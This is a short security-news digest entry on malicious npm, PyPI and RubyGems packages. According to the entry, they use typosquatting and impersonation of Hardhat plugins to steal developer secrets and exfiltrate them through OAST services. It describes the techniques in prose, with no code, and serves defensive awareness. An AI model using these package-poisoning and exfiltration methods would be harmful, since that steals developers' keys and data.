2025-01-09 13:27:58 Pacfic
Hackers Weaponize OAST in NPM, PYPI, Ruby - 1d
Hackers are increasingly weaponizing legitimate security testing tools, specifically Out-of-Band Application Security Testing (OAST) techniques, within the npm, PyPI, and RubyGems ecosystems. Malicious packages are being used to exfiltrate sensitive data and establish command and control channels, allowing for multi-stage attacks using what appears to be legitimate infrastructure. These packages often impersonate genuine libraries to steal developer secrets. For example, one campaign targeted Ethereum developers by mimicking Hardhat plugins to obtain private keys and configuration details. In some cases, threat actors are using a mix of methods, from high versioning to typosquatting of package names to deceive developers into downloading the malicious payloads.
These malicious packages are collecting a range of information, including user system information like hostname, username, working directories, and private keys. This data is often encrypted and transmitted to attacker-controlled endpoints using hardcoded keys and Ethereum addresses. Notably, OAST services such as oastify.com and oast.fun are being abused to exfiltrate this stolen information. This method is particularly dangerous as it allows attackers to perform stealthy reconnaissance and data theft while bypassing basic intrusion detection systems. The exploitation of these ecosystems underscores the need for developers to be vigilant and implement stricter auditing practices.
ImgSrc: securityonline.info
References:
- Cyber Security News - Hackers Weaponize npm, PyPI, & Ruby for Devastating Exploit Packages - 1d
- GBHackers Security | #1 Globally Trusted Cyber Security News Platform - Hackers Weaponize Security Testing By Weaponizing npm, PyPI, & Ruby Exploit Packages - 1d
- Malware Archives ? Cybersecurity News - Malicious Packages Weaponize OAST for Stealthy Data Exfiltration and Reconnaissance - 1d
- cyberpress.org - Hackers Weaponize npm, PyPI, & Ruby for Devastating Exploit Packages - 1d
- gbhackers.com - Hackers Weaponize Security Testing By Weaponizing npm, PyPI, & Ruby Exploit Packages - 1d
- securityonline.info - Malicious Packages Weaponize OAST for Stealthy Data Exfiltration and Reconnaissance - 1d
Classification:
- HashTags: OAST SupplyChain Malware
- Target: Software Developers
- Product: npm, PyPI, RubyGems
- Feature: OAST Abuse
- Type: Malware
- Severity: Major